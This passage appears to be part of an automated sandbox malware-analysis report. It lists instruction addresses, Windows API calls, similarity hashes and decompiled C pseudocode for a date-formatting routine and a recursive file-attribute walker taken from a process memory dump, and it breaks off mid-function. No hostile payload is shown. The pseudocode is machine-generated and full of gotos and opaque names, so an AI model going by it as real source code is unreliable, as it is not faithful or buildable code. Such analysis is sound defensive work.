                                              0x002badc2
                                              0x002badc9
                                              0x002badca
                                              0x002badd0
                                              0x002badda
                                              0x002baddc
                                              0x002baddd
                                              0x002baddf
                                              0x002bade0
                                              0x002badea
                                              0x002badf0
                                              0x002badf3
                                              0x002bae3a
                                              0x002bae46
                                              0x002bae50
                                              0x002bae56
                                              0x002ac6a6
                                              0x002ac6b6
                                              0x002badf5
                                              0x002badf5
                                              0x00000000
                                              0x002badf5
                                              0x002badf3
                                              0x002bad6d
                                              0x002bad4d
                                              0x002ac664
                                              0x002ac664
                                              0x002ac66f
                                              0x002ac671
                                              0x002ac671
                                              0x002ac673
                                              0x002ac684
                                              0x002ac6e7
                                              0x002ac686
                                              0x002ac686
                                              0x002ac686
                                              0x002ac686
                                              0x00000000
                                              0x002ac684
                                              0x002ac65e
                                              0x00000000
                                              0x002ac688
                                              0x002ac68e
                                              0x002ac690
                                              0x002ac693
                                              0x002ac696
                                              0x002ac699
                                              0x002ac699
                                              0x002ac69e
                                              0x002ac6a0
                                              0x002bae5d
                                              0x002bae61
                                              0x00000000
                                              0x002bae67
                                              0x002bae67
                                              0x002bae6e
                                              0x002bae6e
                                              0x002bae74
                                              0x002bae7a
                                              0x002bae7b
                                              0x002bae7b
                                              0x002bae7b
                                              0x002bae7e
                                              0x002bae84
                                              0x002bae84
                                              0x002ac74b
                                              0x002ac74b
                                              0x002ac74d
                                              0x002ac752
                                              0x002ac754
                                              0x002ac756
                                              0x00000000
                                              0x00000000
                                              0x002ac794
                                              0x002ac797
                                              0x002ac79d
                                              0x002ac7a1
                                              0x00000000
                                              0x002ac7a7
                                              0x002ac7a7
                                              0x00000000
                                              0x002ac7a7
                                              0x002ac781
                                              0x002ac786
                                              0x002ac791
                                              0x00000000
                                              0x002ac791
                                              0x002ac758
                                              0x002ac75b
                                              0x002ac75e
                                              0x002baea1
                                              0x002baea3
                                              0x002baea5
                                              0x002baeab
                                              0x002baead
                                              0x002baeaf
                                              0x002baeb1
                                              0x002baeb4
                                              0x002baeb7
                                              0x002baeb7
                                              0x002baeb9
                                              0x002baec5
                                              0x002baebb
                                              0x002baebb
                                              0x002baec0
                                              0x002baec0
                                              0x002baeca
                                              0x002baecd
                                              0x002baece
                                              0x002baece
                                              0x002baed2
                                              0x002baed2
                                              0x002baef3
                                              0x002baefc
                                              0x00000000
                                              0x002baefc
                                              0x002ac764
                                              0x002ac764
                                              0x002ac765
                                              0x002ac76a
                                              0x002ac76f
                                              0x002ac770
                                              0x002ac771
                                              0x002ac772
                                              0x002ac77d
                                              0x002ac77f
                                              0x002ac77f
                                              0x002ac77f
                                              0x00000000
                                              0x002ac75e
                                              0x002bae7b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ac6a0
                                              0x00000000

                                              APIs
                                                • Part of subcall function 002B269C: _get_osfhandle.MSVCRT ref: 002B26A7
                                                • Part of subcall function 002B269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002AC5F8,?,?,?), ref: 002B26B6
                                                • Part of subcall function 002B269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AC5C6), ref: 002B26D2
                                                • Part of subcall function 002B269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,00000002), ref: 002B26E1
                                                • Part of subcall function 002B269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002B26EC
                                                • Part of subcall function 002B269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AC5C6), ref: 002B26F5
                                              • _get_osfhandle.MSVCRT ref: 002AC601
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,002AC5C6,?,?,?,?,?,?,?,?,?,?,?,?,?,002AC5C6), ref: 002AC60F
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,002DB980,000000A0,00000000,00000000,?,?,?,?,?), ref: 002AC67C
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?), ref: 002AC6DC
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002AC6E7
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                              • String ID:
                                              • API String ID: 2173784998-0
                                              • Opcode ID: 6da2ef1acd53b2e6d0fe631437d8110c9d35a590cbffa36456a6b5373cea5695
                                              • Instruction ID: b9e0988463d3a7dbb27c6ec2450986e7a4c9f11fd9c70ea3b4f1b11c5bd6927c
                                              • Opcode Fuzzy Hash: 6da2ef1acd53b2e6d0fe631437d8110c9d35a590cbffa36456a6b5373cea5695
                                              • Instruction Fuzzy Hash: C0819171A10259AFCB24DFA4EC88AFEBBBDEB44751F50402AF906E6150DF709D51CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A5AEF, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 367timeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 75%
                                              			E002A5AEF(void* __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				signed int _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				intOrPtr _t89;
				void* _t90;
				signed int _t96;
				signed int _t97;
				void* _t100;
				void* _t101;
				void* _t110;
				void* _t111;
				signed short _t118;
				long _t128;
				short* _t130;
				void* _t136;
				signed int _t139;
				void* _t143;
				void _t145;
				void _t149;
				signed int _t157;
				signed int _t159;
				signed int _t161;
				int _t164;
				void* _t172;
				signed int _t173;
				signed int _t181;
				signed int _t185;
				void* _t186;
				void* _t189;
				intOrPtr _t197;
				signed int _t202;
				void* _t206;
				void* _t210;
				void* _t211;
				signed int _t212;
				void* _t213;

				_t78 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t78 ^ _t212;
				_t157 = _a4;
				_v364 = __edx;
				_v368 = _t157;
				_v360 = 1;
				if(__ecx != 0) {
					_t161 = 9;
					memcpy( &_v420, __ecx, _t161 << 2);
					_t213 = _t213 + 0xc;
					E002C3C49( &_v420,  &_v376);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v376);
				}
				FileTimeToLocalFileTime( &_v376,  &_v384);
				FileTimeToSystemTime( &_v384,  &_v348);
				_v352 = 0;
				if( *0x2e3cc9 == 0) {
					_t194 = _v348 & 0x0000ffff;
					_t208 = _v346 & 0x0000ffff;
					_t206 = _v342 & 0x0000ffff;
					_v352 = _t194;
					if(_v364 == 0) {
						_t181 = 0x64;
						_t194 = _t194 % _t181;
						_v352 = _t194;
					}
					_t89 =  *0x2cd540; // 0x0
					if(_t89 != 2) {
						if(_t89 == 1) {
							_t110 = _t208;
							_t208 = _t206;
							_t206 = _t110;
						}
					} else {
						_t111 = _t194;
						_t194 = _t206;
						_t206 = _t208;
						_v352 = _t194;
						_t208 = _t111;
					}
					_t164 =  *0x2cd598; // 0x0
					if(_t164 >= 0x20) {
						_t90 =  *0x2cd594; // 0x0
						goto L63;
					} else {
						_t90 = realloc( *0x2cd594, 0x40);
						_pop(0);
						if(_t90 != 0) {
							_t194 = _v352;
							_t164 = 0x20;
							 *0x2cd594 = _t90;
							 *0x2cd598 = _t164;
							L63:
							_push(_t194);
							_push(0x2cf80c);
							_push(_t206);
							_push(0x2cf80c);
							E002B274C(_t90, _t164, L"%02d%s%02d%s%02d", _t208);
							_t213 = _t213 + 0x20;
							_t206 = 2;
							goto L35;
						}
						_push(_t90);
						goto L50;
					}
				} else {
					_v356 = 0;
					if(GetLocaleInfoW(E002B41A4(), 0x1f,  &_v332, 0x80) == 0) {
						_t194 = 0x80;
						E002B1040( &_v332, 0x80,  *0x2cf7f8);
					}
					_t118 = _v332;
					_t210 =  &_v332;
					_t206 = 2;
					if(_t118 == 0) {
						L13:
						if(GetDateFormatW(E002B41A4(), 0,  &_v348,  &_v332,  *0x2cd594,  *0x2cd598) == 0) {
							L32:
							_t208 = GetDateFormatW(E002B41A4(), 0,  &_v348,  &_v332, 0, 0);
							if(_t208 == 0) {
								_t128 = GetLastError();
								_push(0);
								L48:
								 *0x2e3cf0 = _t128;
								_push(_t128);
								L51:
								E002AC5A2(0);
								_t97 = 0;
								L25:
								return E002B6FD0(_t97, _t157, _v8 ^ _t212, _t194, _t206, _t208);
							}
							_t208 = _t208 + 1;
							_t130 = realloc( *0x2cd594, _t208 + _t208);
							_pop(0);
							if(_t130 == 0) {
								_push(0);
								L50:
								_push(8);
								goto L51;
							}
							 *0x2cd594 = _t130;
							 *0x2cd598 = _t208;
							_t208 = 0;
							if(GetDateFormatW(E002B41A4(), 0,  &_v348,  &_v332, _t130, 0) == 0) {
								_t128 = GetLastError();
								_push(0);
								goto L48;
							}
							L35:
							_t208 =  *0x2cd594; // 0x0
							L15:
							_push(E002A5AA7(_v344 & 0x0000ffff));
							_t194 = 0x20;
							E002B1040( &_v76, _t194);
							if(_t157 == 0) {
								if(_v360 != 0) {
									if(E002A68B5() == 0) {
										_push(_t208);
										_push( &_v76);
									} else {
										_push( &_v76);
										_push(_t208);
									}
									_t96 = E002B25D9(L"%s %s ");
								} else {
									_push(_t208);
									_t96 = E002B25D9(L"%s ");
								}
								_t157 = _t96;
								L24:
								_t97 = _t157;
								goto L25;
							}
							if(_v360 == 0 || _v364 != 1) {
								E002B1040(_t157, _a8, _t208);
							} else {
								_t101 = E002A68B5();
								_t197 = _a8;
								_t173 = _t157;
								if(_t101 != 0) {
									E002B1040(_t173, _t197, _t208);
									E002B18C0(_t157, _a8, " ");
									_push( &_v76);
								} else {
									E002B1040(_t173, _t197,  &_v76);
									E002B18C0(_t157, _a8, " ");
									_push(_t208);
								}
								E002B18C0(_t157, _a8);
							}
							_t172 = _t157 + 2;
							_t194 = 0;
							do {
								_t100 =  *_t157;
								_t157 = _t206 + _t157;
							} while (_t100 != 0);
							_t157 = _t157 - _t172 >> 1;
							goto L24;
						}
						_t208 =  *0x2cd594; // 0x0
						if(_t208 == 0) {
							goto L32;
						}
						goto L15;
					} else {
						_t159 = _v356;
						_t185 = _t118 & 0x0000ffff;
						_t136 = 0x64;
						do {
							if(_t185 == 0x27) {
								_t210 = _t210 + _t206;
								_t159 = 0 | _t159 == 0x00000000;
								goto L11;
							}
							if(_t159 != 0 || _t185 != _t136 && _t185 != 0x4d) {
								_t210 = _t210 + _t206;
							} else {
								_t202 = 0;
								do {
									_t210 = _t210 + _t206;
									_t202 = _t202 + 1;
								} while ( *_t210 == _t185);
								_v356 = _t210;
								_t211 = _t210 +  ~_t202 * 2;
								if(_t202 != 1) {
									_t143 = 0x64;
									if(_t185 == _t143) {
										_v360 = 0;
									}
									if(_t202 <= 3) {
										_t210 = _v356;
									} else {
										_t194 = _v356;
										_t186 = _t194;
										_v356 = _t186 + 2;
										do {
											_t145 =  *_t186;
											_t186 = _t186 + _t206;
										} while (_t145 != _v352);
										_t210 = _t211 + 6;
										memmove(_t210, _t194, 2 + (_t186 - _v356 >> 1) * 2);
										_t213 = _t213 + 0xc;
									}
									goto L11;
								}
								_t189 = _t211;
								_t194 = _t189 + 2;
								do {
									_t149 =  *_t189;
									_t189 = _t189 + _t206;
								} while (_t149 != _v352);
								memmove(_t211 + 2, _t211, 2 + (_t189 - _t194 >> 1) * 2);
								_t213 = _t213 + 0xc;
								_t210 = _t211 + 4;
							}
							L11:
							_t139 =  *_t210 & 0x0000ffff;
							_t185 = _t139;
							_t136 = 0x64;
						} while (_t139 != 0);
						_t157 = _v368;
						goto L13;
					}
				}
			}























































                                              0x002a5afa
                                              0x002a5b01
                                              0x002a5b05
                                              0x002a5b0b
                                              0x002a5b11
                                              0x002a5b17
                                              0x002a5b24
                                              0x002b9ae4
                                              0x002b9aeb
                                              0x002b9aeb
                                              0x002b9af9
                                              0x002a5b2a
                                              0x002a5b31
                                              0x002a5b45
                                              0x002a5b45
                                              0x002a5b59
                                              0x002a5b6d
                                              0x002a5b75
                                              0x002a5b81
                                              0x002b9bba
                                              0x002b9bc1
                                              0x002b9bc8
                                              0x002b9bcf
                                              0x002b9bdb
                                              0x002b9be3
                                              0x002b9be4
                                              0x002b9be6
                                              0x002b9be6
                                              0x002b9bec
                                              0x002b9bf4
                                              0x002b9c09
                                              0x002b9c0b
                                              0x002b9c0d
                                              0x002b9c0f
                                              0x002b9c0f
                                              0x002b9bf6
                                              0x002b9bf6
                                              0x002b9bf8
                                              0x002b9bfa
                                              0x002b9bfc
                                              0x002b9c02
                                              0x002b9c02
                                              0x002b9c11
                                              0x002b9c1a
                                              0x002b9c4c
                                              0x00000000
                                              0x002b9c1c
                                              0x002b9c24
                                              0x002b9c2b
                                              0x002b9c2e
                                              0x002b9c36
                                              0x002b9c3e
                                              0x002b9c3f
                                              0x002b9c44
                                              0x002b9c51
                                              0x002b9c51
                                              0x002b9c57
                                              0x002b9c58
                                              0x002b9c59
                                              0x002b9c62
                                              0x002b9c67
                                              0x002b9c6c
                                              0x00000000
                                              0x002b9c6c
                                              0x002b9c30
                                              0x00000000
                                              0x002b9c30
                                              0x002a5b87
                                              0x002a5b87
                                              0x002a5baa
                                              0x002b9b09
                                              0x002b9b11
                                              0x002b9b11
                                              0x002a5bb0
                                              0x002a5bb7
                                              0x002a5bbf
                                              0x002a5bc3
                                              0x002a5c07
                                              0x002a5c32
                                              0x002a5d34
                                              0x002a5d53
                                              0x002a5d57
                                              0x002b9b8d
                                              0x002b9b95
                                              0x002b9b9f
                                              0x002b9b9f
                                              0x002b9ba4
                                              0x002b9bac
                                              0x002b9bac
                                              0x002b9bb3
                                              0x002a5cca
                                              0x002a5cda
                                              0x002a5cda
                                              0x002a5d5d
                                              0x002a5d68
                                              0x002a5d6f
                                              0x002a5d72
                                              0x002b9ba9
                                              0x002b9baa
                                              0x002b9baa
                                              0x00000000
                                              0x002b9baa
                                              0x002a5d7a
                                              0x002a5d8c
                                              0x002a5d93
                                              0x002a5da4
                                              0x002b9b98
                                              0x002b9b9e
                                              0x00000000
                                              0x002b9b9e
                                              0x002a5daa
                                              0x002a5daa
                                              0x002a5c46
                                              0x002a5c52
                                              0x002a5c55
                                              0x002a5c59
                                              0x002a5c60
                                              0x002b9c79
                                              0x002b9c94
                                              0x002b9c9a
                                              0x002b9c9b
                                              0x002b9c96
                                              0x002b9c96
                                              0x002b9c97
                                              0x002b9c97
                                              0x002b9ca1
                                              0x002b9c7b
                                              0x002b9c7b
                                              0x002b9c81
                                              0x002b9c87
                                              0x002b9ca9
                                              0x002a5cc8
                                              0x002a5cc8
                                              0x00000000
                                              0x002a5cc8
                                              0x002a5c6d
                                              0x002b9cd4
                                              0x002a5c80
                                              0x002a5c80
                                              0x002a5c85
                                              0x002a5c88
                                              0x002a5c8c
                                              0x002b9cb1
                                              0x002b9cc0
                                              0x002b9cc8
                                              0x002a5c92
                                              0x002a5c96
                                              0x002a5ca5
                                              0x002a5caa
                                              0x002a5caa
                                              0x002a5cb0
                                              0x002a5cb0
                                              0x002a5cb5
                                              0x002a5cb8
                                              0x002a5cba
                                              0x002a5cba
                                              0x002a5cbd
                                              0x002a5cbf
                                              0x002a5cc6
                                              0x00000000
                                              0x002a5cc6
                                              0x002a5c38
                                              0x002a5c40
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a5bc5
                                              0x002a5bc5
                                              0x002a5bcd
                                              0x002a5bd0
                                              0x002a5bd1
                                              0x002a5bd5
                                              0x002b9b1d
                                              0x002b9b24
                                              0x00000000
                                              0x002b9b24
                                              0x002a5bdd
                                              0x002a5bf2
                                              0x002a5cdd
                                              0x002a5cdf
                                              0x002a5ce1
                                              0x002a5ce1
                                              0x002a5ce3
                                              0x002a5ce4
                                              0x002a5ceb
                                              0x002a5cf3
                                              0x002a5cf9
                                              0x002b9b2d
                                              0x002b9b31
                                              0x002b9b35
                                              0x002b9b35
                                              0x002b9b3e
                                              0x002b9b82
                                              0x002b9b40
                                              0x002b9b40
                                              0x002b9b46
                                              0x002b9b4b
                                              0x002b9b51
                                              0x002b9b51
                                              0x002b9b54
                                              0x002b9b56
                                              0x002b9b65
                                              0x002b9b74
                                              0x002b9b7a
                                              0x002b9b7a
                                              0x00000000
                                              0x002b9b3e
                                              0x002a5cff
                                              0x002a5d01
                                              0x002a5d04
                                              0x002a5d04
                                              0x002a5d07
                                              0x002a5d09
                                              0x002a5d23
                                              0x002a5d29
                                              0x002a5d2c
                                              0x002a5d2c
                                              0x002a5bf4
                                              0x002a5bf4
                                              0x002a5bf9
                                              0x002a5bfe
                                              0x002a5bfe
                                              0x002a5c01
                                              0x00000000
                                              0x002a5c01
                                              0x002a5bc3

                                              APIs
                                              • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002CF830,?,00002000), ref: 002A5B31
                                              • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 002A5B45
                                              • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 002A5B59
                                              • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 002A5B6D
                                              • realloc.MSVCRT ref: 002B9C24
                                                • Part of subcall function 002B41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(002A5BA1,0000001F,?,00000080), ref: 002B41A4
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 002A5BA2
                                              • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 002A5C2A
                                              • memmove.MSVCRT ref: 002A5D23
                                              • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 002A5D4D
                                              • realloc.MSVCRT ref: 002A5D68
                                              • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 002A5D9C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                              • String ID: %02d%s%02d%s%02d$%s $%s %s
                                              • API String ID: 2927284792-4023967598
                                              • Opcode ID: 42b9e43aae1fb067c6dc5617c2f0262a839e6f04228f68f090f6eb535826feb9
                                              • Instruction ID: df5912f1331cd5eac3fbe5f43d8e61047a058ea5943adf58637861e544a02ad7
                                              • Opcode Fuzzy Hash: 42b9e43aae1fb067c6dc5617c2f0262a839e6f04228f68f090f6eb535826feb9
                                              • Instruction Fuzzy Hash: 27C127719206299FDB20DF54DC89AEF77B9EF89340F4040A6E909E7250DA309EE5CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A85EA, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 378fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E002A85EA(WCHAR* __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				struct _WIN32_FIND_DATAW _v1140;
				WCHAR* _v1144;
				long _v1148;
				void* _v1152;
				char _v1156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t104;
				short _t117;
				void* _t121;
				signed int _t122;
				signed int _t124;
				WCHAR* _t126;
				void* _t127;
				void* _t130;
				WCHAR* _t136;
				intOrPtr _t139;
				WCHAR* _t140;
				WCHAR* _t144;
				intOrPtr _t147;
				WCHAR* _t151;
				WCHAR* _t153;
				WCHAR* _t158;
				WCHAR* _t159;
				long _t160;
				long _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				WCHAR* _t168;
				WCHAR* _t169;
				void* _t173;
				void* _t177;
				long _t178;
				void* _t179;
				void* _t180;
				short* _t186;
				signed int _t188;
				long _t192;
				signed int _t193;
				signed int _t194;
				intOrPtr* _t197;
				signed int _t198;
				signed int _t199;
				intOrPtr* _t203;
				signed int _t205;
				WCHAR* _t207;
				char* _t208;
				char* _t209;
				long _t214;
				signed int _t220;
				WCHAR* _t221;
				signed int _t222;
				long _t223;
				signed int _t224;
				void* _t225;
				void* _t226;
				void* _t241;
				void* _t260;

				_t217 = __edx;
				_t104 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t104 ^ _t224;
				_v24 = 1;
				_t223 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t220 = __edx;
				_t176 = __ecx;
				_v1148 = __edx;
				_v1144 = __ecx;
				memset( &_v548, 0, 0x104);
				_t226 = _t225 + 0xc;
				if(E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t223 = 8;
					goto L43;
				} else {
					 *_t220 = 1;
					_t221 = _t176;
					_t186 =  &(_t221[1]);
					do {
						_t117 =  *_t221;
						_t221 =  &(_t221[1]);
					} while (_t117 != 0);
					_t222 = _t221 - _t186;
					_t220 = _t222 >> 1;
					if(_t222 == 0) {
						_t223 = 0xa1;
						L43:
						__imp__??_V@YAXPAX@Z();
						return E002B6FD0(_t223, _t176, _v8 ^ _t224, _t217, _t220, _t223, _v28);
					}
					if(_t220 + 3 > 0x7fe7) {
						L42:
						_t223 = E002A8885(_t176);
						goto L43;
					}
					_t121 = FindFirstFileW(_t176,  &_v1140);
					if(_t121 == 0xffffffff) {
						_t122 = 0x10;
						_t188 = 0;
						_v1140.dwFileAttributes = _t122;
						_v1140.dwReserved0 = 0;
					} else {
						FindClose(_t121);
						_t188 = _v1140.dwReserved0;
						_t122 = _v1140.dwFileAttributes;
					}
					if((_t122 & 0x00000010) == 0) {
						goto L42;
					} else {
						if((_t122 & 0x00000400) != 0) {
							__eflags = _t188 & 0x20000000;
							if((_t188 & 0x20000000) != 0) {
								goto L42;
							}
						}
						E002B0D89(_t217, _t176);
						_t124 =  *(_t176 + _t220 * 2 - 2) & 0x0000ffff;
						if(_t124 != 0x3a && _t124 != 0x5c) {
							E002B0CF2(_t217, "\\");
							_t220 = _t220 + 1;
						}
						E002B0CF2(_t217, "*");
						_t126 = _v28;
						if(_t126 == 0) {
							_t126 =  &_v548;
						}
						_t127 = FindFirstFileW(_t126,  &_v1140);
						_v1152 = _t127;
						if(_t127 == 0xffffffff) {
							goto L42;
						} else {
							while(1) {
								L14:
								_t241 =  *0x2cd544 - _t223; // 0x0
								if(_t241 != 0) {
									break;
								}
								_t217 =  &(_v1140.cAlternateFileName);
								_t192 = _t217;
								_t177 = _t192 + 2;
								do {
									_t130 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t130 != _t223);
								_t193 = _t192 - _t177;
								_t194 = _t193 >> 1;
								if(_t193 != 0) {
									L21:
									if(_t194 + _t220 >= 0x7fe7) {
										_t176 = _v1144;
										_push(_t217);
										 *_v1148 = _t223;
										E002AC5A2(_t194, 0x400023da, 2, _v1144);
										L41:
										FindClose(_v1152);
										_t260 =  *0x2cd544 - _t223; // 0x0
										if(_t260 != 0) {
											goto L43;
										}
										goto L42;
									}
									_t134 = _v28;
									if(_v28 == 0) {
										_t134 =  &_v548;
									}
									E002B1040(_t134 + _t220 * 2, _v20 - _t220, _t217);
									_t178 = _v1140.dwFileAttributes;
									if((_t178 & 0x00000010) == 0) {
										__eflags = _t178 & 0x00000001;
										if((_t178 & 0x00000001) != 0) {
											_t207 = _v28;
											__eflags = _t207;
											if(_t207 == 0) {
												_t207 =  &_v548;
											}
											_t162 = _t178 & 0xfffffffe;
											__eflags = _t162;
											SetFileAttributesW(_t207, _t162);
										}
										_t196 = _v28;
										__eflags = _v28;
										if(_v28 == 0) {
											_t196 =  &_v548;
										}
										_t217 = _t178;
										_t136 = E002A83F2(_t196, _t178);
										__eflags = _t136;
										if(_t136 == 0) {
											goto L39;
										} else {
											__eflags = _t136 - 0x4d3;
											if(_t136 == 0x4d3) {
												break;
											}
											__eflags = _t136 - 3;
											if(_t136 == 3) {
												_t158 = _v28;
												__eflags = _t158;
												if(_t158 == 0) {
													_t158 =  &_v548;
												}
												__imp___wcsnicmp(_t158, L"\\\\?\\", 4);
												_t226 = _t226 + 0xc;
												__eflags = _t158;
												if(_t158 != 0) {
													_t159 = _v28;
													__eflags = _t159;
													if(_t159 == 0) {
														_t159 =  &_v548;
													}
													_t160 = GetFullPathNameW(_t159, _t223, _t223, _t223);
													__eflags = _t160 - 0x7fe7;
													if(_t160 > 0x7fe7) {
														SetLastError(0x6f);
													}
												}
											}
											_t197 =  &(_v1140.cAlternateFileName);
											_t217 = _t197 + 2;
											do {
												_t139 =  *_t197;
												_t197 = _t197 + 2;
												__eflags = _t139 - _t223;
											} while (_t139 != _t223);
											_t140 = _v28;
											_t198 = _t197 - _t217;
											__eflags = _t198;
											_t199 = _t198 >> 1;
											if(_t198 == 0) {
												L86:
												__eflags = _t140;
												if(_t140 == 0) {
													_t140 =  &_v548;
												}
												E002AC5A2(_t199, 0x4000271b, 1, _t140);
												_t226 = _t226 + 0xc;
												L89:
												_push(_t223);
												_push(GetLastError());
												E002AC5A2(_t199);
												_t144 = _v28;
												__eflags = _t144;
												if(_t144 == 0) {
													_t144 =  &_v548;
												}
												SetFileAttributesW(_t144, _t178);
												 *_v1148 = _t223;
												goto L39;
											}
											__eflags = _t140;
											if(_t140 == 0) {
												_t140 =  &_v548;
											}
											__eflags = 0;
											_t140[_t220] = 0;
											_t203 =  &(_v1140.cFileName);
											_t217 = _t203 + 2;
											do {
												_t147 =  *_t203;
												_t203 = _t203 + 2;
												__eflags = _t147 - _t223;
											} while (_t147 != _t223);
											_t205 = _t203 - _t217 >> 1;
											_t199 =  &_v548;
											__eflags = _t205 + _t220 - 0x7fe7;
											if(_t205 + _t220 < 0x7fe7) {
												E002B0CF2(_t217,  &(_v1140.cFileName));
												_t151 = _v28;
												__eflags = _t151;
												if(_t151 == 0) {
													_t151 =  &_v548;
												}
												E002AC5A2(_t199, 0x4000271b, 1, _t151);
												_t153 = _v28;
												_t226 = _t226 + 0xc;
												__eflags = _t153;
												if(_t153 == 0) {
													_t153 =  &_v548;
												}
												_t153[_t220] = 0;
												_t199 =  &_v548;
												E002B0CF2(_t217,  &(_v1140.cAlternateFileName));
												goto L89;
											}
											E002B0CF2(_t217,  &(_v1140.cAlternateFileName));
											_t140 = _v28;
											goto L86;
										}
									} else {
										_t208 = ".";
										_t164 =  &(_v1140.cFileName);
										_t179 = 4;
										while(1) {
											_t217 =  *_t164;
											if(_t217 !=  *_t208) {
												break;
											}
											if(_t217 == 0) {
												L29:
												_t165 = _t223;
												L30:
												if(_t165 == 0) {
													L39:
													if(FindNextFileW(_v1152,  &_v1140) != 0) {
														goto L14;
													}
													goto L40;
												}
												_t209 = L"..";
												_t166 =  &(_v1140.cFileName);
												while(1) {
													_t217 =  *_t166;
													if(_t217 !=  *_t209) {
														break;
													}
													if(_t217 == 0) {
														L36:
														_t167 = _t223;
														L38:
														if(_t167 != 0) {
															_t210 = _v28;
															__eflags = _v28;
															if(_v28 == 0) {
																_t210 =  &_v548;
															}
															_t217 =  &_v1156;
															_t168 = E002A85EA(_t210,  &_v1156);
															__eflags =  *0x2cd544 - _t223; // 0x0
															if(__eflags != 0) {
																goto L40;
															} else {
																__eflags = _t168;
																if(_t168 == 0) {
																	goto L39;
																}
																_t211 = _v1148;
																 *_v1148 = _t223;
																__eflags = _t168 - 0x91;
																if(_t168 != 0x91) {
																	L58:
																	_t169 = _v28;
																	__eflags = _t169;
																	if(_t169 == 0) {
																		_t169 =  &_v548;
																	}
																	E002AC5A2(_t211, 0x4000271b, 1, _t169);
																	_t226 = _t226 + 0xc;
																	_push(_t223);
																	_push(GetLastError());
																	E002AC5A2(_t211);
																	goto L39;
																}
																__eflags = _v1156 - _t223;
																if(_v1156 == _t223) {
																	goto L39;
																}
																goto L58;
															}
														}
														goto L39;
													}
													_t217 =  *((intOrPtr*)(_t166 + 2));
													_t47 =  &(_t209[2]); // 0x2e
													if(_t217 !=  *_t47) {
														break;
													}
													_t166 = _t166 + _t179;
													_t209 =  &(_t209[_t179]);
													if(_t217 != 0) {
														continue;
													}
													goto L36;
												}
												asm("sbb eax, eax");
												_t167 = _t166 | 0x00000001;
												__eflags = _t167;
												goto L38;
											}
											_t217 =  *((intOrPtr*)(_t164 + 2));
											_t44 =  &(_t208[2]); // 0x200000
											if(_t217 !=  *_t44) {
												break;
											}
											_t164 = _t164 + _t179;
											_t208 =  &(_t208[_t179]);
											if(_t217 != 0) {
												continue;
											}
											goto L29;
										}
										asm("sbb eax, eax");
										_t165 = _t164 | 0x00000001;
										goto L30;
									}
								}
								_t217 =  &(_v1140.cFileName);
								_t214 = _t217;
